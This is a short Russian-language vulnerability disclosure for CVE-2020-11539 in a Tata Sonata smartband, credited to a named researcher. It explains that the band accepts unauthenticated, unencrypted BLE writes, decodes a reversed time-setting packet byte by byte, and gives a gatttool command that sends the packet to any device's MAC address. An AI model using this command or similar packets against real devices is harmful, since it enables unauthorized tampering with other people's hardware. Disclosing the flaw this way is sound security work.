
Неправильный контроль доступа в Tata Sonata Smartband
Описание: Было выявлено, что умный браслет не имеет сопряжения (уровень безопасности BLE mode 0). Данные, передаваемые по беспроводному каналу, не шифруются. Кроме того, данные, отправляемые на умный браслет, не имеют аутентификации или проверки подписи, что позволяет любому злоумышленнику управлять параметром умного устройства.
Затронутые версии: Smart SF Rush - 1.12
Исследователь: Sayli Ambure (https://twitter.com/sayli_ambure)
Ссылка на CVE (MITRE): https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
Следующий пакет был реверсирован и, как выяснилось, предназначен для изменения времени; больше пакетов можно реверсировать, извлекая дамп hcisnoop с вашего телефона.
Значение данных: 00870e00141401060712052b051e
| Hexdump данных: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Данные в десятичном виде: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: Заголовок пакета
0e 00: Тип пакета
14 14: Год в hex (2020)
01 06: Месяц и день (6 января)
07 12: Час и минуты в hex (07:18)
05 : Секунды
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e